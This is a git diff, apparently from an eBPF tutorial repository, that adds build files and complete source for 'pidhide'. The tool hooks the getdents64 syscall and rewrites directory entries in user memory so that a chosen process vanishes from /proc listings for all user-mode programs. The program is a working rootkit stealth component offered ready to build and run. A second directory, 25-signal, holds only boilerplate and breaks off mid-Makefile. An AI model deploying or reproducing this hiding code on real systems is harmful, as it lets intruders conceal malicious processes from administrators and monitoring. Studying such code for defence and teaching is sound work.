diff --git a/src/24-hide/.gitignore b/src/24-hide/.gitignore new file mode 100644 index 0000000..81acd4b --- /dev/null +++ b/src/24-hide/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +textreplace2 diff --git a/src/24-hide/LICENSE b/src/24-hide/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/src/24-hide/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/src/24-hide/Makefile b/src/24-hide/Makefile new file mode 100644 index 0000000..ecfd9e1 --- /dev/null +++ b/src/24-hide/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/src/24-hide/common.h b/src/24-hide/common.h new file mode 100644 index 0000000..4686d92 --- /dev/null +++ b/src/24-hide/common.h @@ -0,0 +1,35 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/src/24-hide/common_um.h b/src/24-hide/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/src/24-hide/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/src/24-hide/pidhide.bpf.c b/src/24-hide/pidhide.bpf.c new file mode 100644 index 0000000..f61dfaf --- /dev/null +++ b/src/24-hide/pidhide.bpf.c @@ -0,0 +1,210 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to fold the dents buffer addresses +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buffs SEC(".maps"); + +// Map used to enable searching through the +// data in a loop +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, int); +} map_bytes_read SEC(".maps"); + +// Map with address of actual +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_to_patch SEC(".maps"); + +// Map to hold program tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the string represenation +// of the PID to hide. This becomes the name +// of the folder in /proc/ +const int max_pid_len = 10; +const volatile int pid_to_hide_len = 0; +const volatile char pid_to_hide[max_pid_len]; + +// struct linux_dirent64 { +// u64 d_ino; /* 64-bit inode number */ +// u64 d_off; /* 64-bit offset to next structure */ +// unsigned short d_reclen; /* Size of this dirent */ +// unsigned char d_type; /* File type */ +// char d_name[]; /* Filename (null-terminated) */ }; +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); +SEC("tp/syscalls/sys_enter_getdents64") +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + int pid = pid_tgid >> 32; + unsigned int fd = ctx->args[0]; + unsigned int buff_count = ctx->args[2]; + + // Store params in map for exit function + struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; + bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. + // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[max_pid_len]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[max_pid_len]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} diff --git a/src/24-hide/pidhide.c b/src/24-hide/pidhide.c new file mode 100644 index 0000000..7f03609 --- /dev/null +++ b/src/24-hide/pidhide.c @@ -0,0 +1,178 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include +#include +#include +#include "pidhide.skel.h" +#include "common_um.h" +#include "common.h" + +// Setup Argument stuff +static struct env { + int pid_to_hide; + int target_ppid; +} env; + +const char *argp_program_version = "pidhide 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"PID Hider\n" +"\n" +"Uses eBPF to hide a process from usermode processes\n" +"By hooking the getdents64 syscall and unlinking the pid folder\n" +"\n" +"USAGE: ./pidhide -p 2222 [-t 1111]\n"; + +static const struct argp_option opts[] = { + { "pid-to-hide", 'p', "PID-TO-HIDE", 0, "Process ID to hide. Defaults to this program" }, + { "target-ppid", 't', "TARGET-PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'p': + errno = 0; + env.pid_to_hide = strtol(arg, NULL, 10); + if (errno || env.pid_to_hide <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Hid PID from program %d (%s)\n", e->pid, e->comm); + else + printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct pidhide_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.pid_to_hide == 0) { + printf("Pid Requried, see %s --help\n", argv[0]); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = pidhide_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Set the Pid to hide, defaulting to our own PID + char pid_to_hide[10]; + if (env.pid_to_hide == 0) { + env.pid_to_hide = getpid(); + } + sprintf(pid_to_hide, "%d", env.pid_to_hide); + strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); + skel->rodata->pid_to_hide_len = strlen(pid_to_hide)+1; + skel->rodata->target_ppid = env.target_ppid; + + // Verify and load program + err = pidhide_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Setup Maps for tail calls + int index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.handle_getdents_exit); + int ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.handle_getdents_patch); + ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = pidhide_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + printf("Hiding PID %d\n", env.pid_to_hide); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + pidhide_bpf__destroy( skel); + return -err; +} diff --git a/src/25-signal/.gitignore b/src/25-signal/.gitignore new file mode 100644 index 0000000..81acd4b --- /dev/null +++ b/src/25-signal/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +textreplace2 diff --git a/src/25-signal/LICENSE b/src/25-signal/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/src/25-signal/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/src/25-signal/Makefile b/src/25-signal/Makefile new file mode 100644 index 0000000..ecfd9e1 --- /dev/null +++ b/src/25-signal/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build 